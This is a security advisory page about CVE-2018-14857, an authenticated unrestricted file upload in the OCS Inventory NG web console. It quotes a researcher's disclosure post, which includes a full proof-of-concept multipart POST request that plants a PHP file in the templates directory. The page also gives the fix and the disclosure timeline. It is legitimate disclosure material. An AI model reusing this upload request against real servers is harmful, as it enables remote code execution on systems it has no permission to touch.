Home    |    View Topics    |    Search    |    Contact Us    |   



Category:   Application (Generic)  >   OCS inventory NG Vendors:
OCS inventory NG Lack of Template File Upload Restrictions Lets Remote Authenticated Users Upload and Execute Arbitrary Code
SecurityTracker Alert ID:  1041418
SecurityTracker URL:
CVE Reference:   CVE-2018-14857   (Links to External Site)
Date:  Aug 3 2018
Impact:   Execution of arbitrary code via network, Modification of system information, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  

Description:   A vulnerability was reported in OCS inventory NG. A remote authenticated user can upload files and execute arbitrary code on the target system.

A remote authenticated user can upload a specially crafted template file containing PHP code and then cause the code to be executed on the target system. The code will run with the privileges of the target service.

Simon Uvarov reported this vulnerability.

Impact:   A remote authenticated user can upload files to the target system.

A remote authenticated user can execute arbitrary PHP code on the target system.

Solution:   The vendor has issued a source code fix, available at:

Vendor URL: (Links to External Site)
Cause:   Access control error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.

 Source Message Contents

Subject:  [FD] CVE-2018-14857 (Unrestricted File Upload (RCE) in OCS Inventory NG Webconsole before 2.5)

# Title
Unrestricted File Upload (RCE) in OCS Inventory NG Webconsole before 2.5

#Reserved CVE

# Vulnerability Overview
OCS Inventory NG OCS Inventory Server through 2.5 allows a privileged user to gain access to the server via a template file containing PHP code, because file extensions other than .html are permitted.

# Discovered By
Simon Uvarov

# Vendor Status

# Vulnerability Details
The following request saves the phpinfo.php file to the `/usr/share/ocsinventory-reports/ocsreports/templates/` directory.

POST /ocsreports/index.php?function=notification HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------2093529028912
Content-Length: 970
Cookie: VERS=7015; show_all_plugins_col=a%3A6%3A%7Bi%3A0%3Bs%3A1%3A%220%22%3Bi%3A1%3Bs%3A1%3A%222%22%3Bi%3A2%3Bs%3A1%3A%223%22%3Bi%3A3%3Bs%3A1%3A%224%22%3Bi%3A4%3Bs%3A1%3A%225%22%3Bi%3A5%3Bs%3A1%3A%228%22%3B%7D; LANG=en_GB; IPDISCOVER_inv_col=a%3A6%3A%7Bi%3A0%3Bs%3A1%3A%220%22%3Bi%3A1%3Bs%3A1%3A%222%22%3Bi%3A2%3Bs%3A1%3A%223%22%3Bi%3A3%3Bs%3A1%3A%224%22%3Bi%3A4%3Bs%3A1%3A%226%22%3Bi%3A5%3Bs%3A1%3A%227%22%3B%7D; DOWNLOAD_AFFECT_RULES_col=a%3A2%3A%7Bi%3A0%3Bs%3A1%3A%220%22%3Bi%3A1%3Bs%3A1%3A%224%22%3B%7D; PHPSESSID=0ljuolnkjcbh77ie825k3c2dc7
Connection: close
Upgrade-Insecure-Requests: 1

Content-Disposition: form-data; name="CSRF_584"

Content-Disposition: form-data; name="onglet"

Content-Disposition: form-data; name="old_onglet"

Content-Disposition: form-data; name="notif_choice"

Content-Disposition: form-data; name="template"; filename="phpinfo.php"
Content-Type: text/html

<?php phpinfo(); ?>

Content-Disposition: form-data; name="subject"

Content-Disposition: form-data; name="RELOAD_CONF"

Content-Disposition: form-data; name="Send"



The PHP file is then accessible via

# Timeline:
2018-08-01: vuln discovered
2018-08-01: emailed vendor
2018-08-02: reply from vendor: vuln confirmed & patch is created
2018-08-03: public disclosure

# Patch:

Sent through the Full Disclosure mailing list
Web Archives & RSS:

Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, LLC